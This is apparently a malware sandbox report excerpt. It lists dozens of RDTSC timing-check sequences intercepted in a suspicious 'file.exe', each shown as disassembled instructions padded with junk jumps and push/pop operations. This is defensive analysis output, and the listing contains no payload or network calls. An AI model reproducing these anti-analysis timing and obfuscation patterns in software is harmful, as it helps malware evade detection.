                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688A9B second address: 688ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F865CD192FDh 0x0000000d jmp 00007F865CD192E4h 0x00000012 jmp 00007F865CD192E3h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688ACF second address: 688ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F865D1C5546h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68891C second address: 688933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F7F5 second address: 68F80D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F865D1C554Eh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FC17 second address: 68FC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FD6C second address: 68FD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FF43 second address: 68FF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FF4B second address: 68FF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938B3 second address: 6938B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938B8 second address: 6938BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938BE second address: 6938C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938C4 second address: 6938CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938CC second address: 6938D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938D2 second address: 6938DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F865D1C5546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693426 second address: 69345C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E8h 0x00000009 jmp 00007F865CD192E9h 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69345C second address: 693468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F865D1C5546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6935EA second address: 6935EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6935EE second address: 693606 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F865D1C5546h 0x00000008 jmp 00007F865D1C554Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695EEC second address: 695EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695EF2 second address: 695EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8297 second address: 6A82AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192DFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA4B9 second address: 6BA4D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA5F3 second address: 6BA5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA5F7 second address: 6BA611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F865D1C554Ch 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA611 second address: 6BA62F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E4h 0x00000007 jnp 00007F865CD192EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4757 second address: 6D475B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D475B second address: 6D4764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D354D second address: 6D3566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F865D1C5552h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D371D second address: 6D3723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3E5E second address: 6D3E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C5559h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3E7B second address: 6D3EA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007F865CD192D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F865CD192E7h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3EA1 second address: 6D3EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3EA7 second address: 6D3EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3EAD second address: 6D3ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F865D1C554Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F865D1C554Bh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3ED0 second address: 6D3ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D405E second address: 6D4062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4062 second address: 6D406A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D406A second address: 6D4074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F865D1C5546h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4344 second address: 6D4364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F865CD192E1h 0x0000000b popad 0x0000000c js 00007F865CD192E2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73FE second address: 6D740F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D775A second address: 6D7784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F865CD192E9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F865CD192D8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA279 second address: 6DA294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jbe 00007F865D1C5576h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA294 second address: 6DA298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10325 second address: 4E10335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10335 second address: 4E10339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10339 second address: 4E10348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10348 second address: 4E1034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1034C second address: 4E10364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10364 second address: 4E1039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865CD192E1h 0x00000009 or si, 1E86h 0x0000000e jmp 00007F865CD192E1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1039B second address: 4E103A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E103A1 second address: 4E103C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F865CD192DDh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E103C6 second address: 4E103CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E103CC second address: 4E103D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0E4D second address: 4DF0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0E67 second address: 4DF0E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F865CD192E0h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0E8C second address: 4DF0E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F18 second address: 4E30F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F35 second address: 4E30F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F45 second address: 4E30F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F865CD192DBh 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F68 second address: 4E30F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD00F7 second address: 4DD00FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD00FB second address: 4DD0112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0112 second address: 4DD018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F865CD192E1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F865CD192DEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F865CD192DDh 0x00000020 or esi, 4F248F36h 0x00000026 jmp 00007F865CD192E1h 0x0000002b popfd 0x0000002c call 00007F865CD192E0h 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD018D second address: 4DD01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, 68AF4AB3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+04h] 0x00000010 jmp 00007F865D1C5556h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F865D1C5557h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD01CF second address: 4DD01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD01D5 second address: 4DD01D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BF3 second address: 4DF0BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BF9 second address: 4DF0BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BFD second address: 4DF0C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F865CD192E6h 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F865CD192E1h 0x00000016 and cl, FFFFFFB6h 0x00000019 jmp 00007F865CD192E1h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F865CD192E0h 0x00000025 or cx, 5CD8h 0x0000002a jmp 00007F865CD192DBh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov ebx, esi 0x00000035 mov ecx, 32ECA987h 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C79 second address: 4DF0C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C7E second address: 4DF0C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C84 second address: 4DF0C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C88 second address: 4DF0C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C8C second address: 4DF0CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, 77h 0x0000000e mov edi, 0D9C0280h 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF077F second address: 4DF0786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0786 second address: 4DF082B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F865D1C5559h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F865D1C554Eh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 call 00007F865D1C554Eh 0x0000001b pushfd 0x0000001c jmp 00007F865D1C5552h 0x00000021 sub ax, D728h 0x00000026 jmp 00007F865D1C554Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d push ebx 0x0000002e pushfd 0x0000002f jmp 00007F865D1C5554h 0x00000034 or eax, 21C90988h 0x0000003a jmp 00007F865D1C554Bh 0x0000003f popfd 0x00000040 pop ecx 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F865D1C5552h 0x0000004a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF06EA second address: 4DF070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 mov di, 518Ah 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF041A second address: 4DF0420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0420 second address: 4DF0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0424 second address: 4DF0428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0428 second address: 4DF046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F865CD192DCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F865CD192E0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F865CD192E7h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF046B second address: 4DF04D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865D1C554Fh 0x00000009 sbb ax, ECCEh 0x0000000e jmp 00007F865D1C5559h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F865D1C5550h 0x0000001a add cx, 8548h 0x0000001f jmp 00007F865D1C554Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 pop ebp 0x00000029 pushad 0x0000002a pushad 0x0000002b mov eax, 13778351h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0B8F second address: 4DE0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0B9F second address: 4DE0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606EF second address: 4E606F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606F5 second address: 4E6076D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F865CD192E9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F865CD192DEh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F865CD192DDh 0x00000022 sbb cl, FFFFFF86h 0x00000025 jmp 00007F865CD192E1h 0x0000002a popfd 0x0000002b call 00007F865CD192E0h 0x00000030 pop eax 0x00000031 popad 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50A63 second address: 4E50A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C5557h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E508F6 second address: 4E508FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01A2 second address: 4DF01B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01B1 second address: 4DF01C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192E4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01C9 second address: 4DF01FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007F865D1C554Ah 0x0000000f mov edi, ecx 0x00000011 pop ecx 0x00000012 mov al, bl 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F865D1C5555h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF01FD second address: 4DF020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C7D second address: 4E50C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50C83 second address: 4E50C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
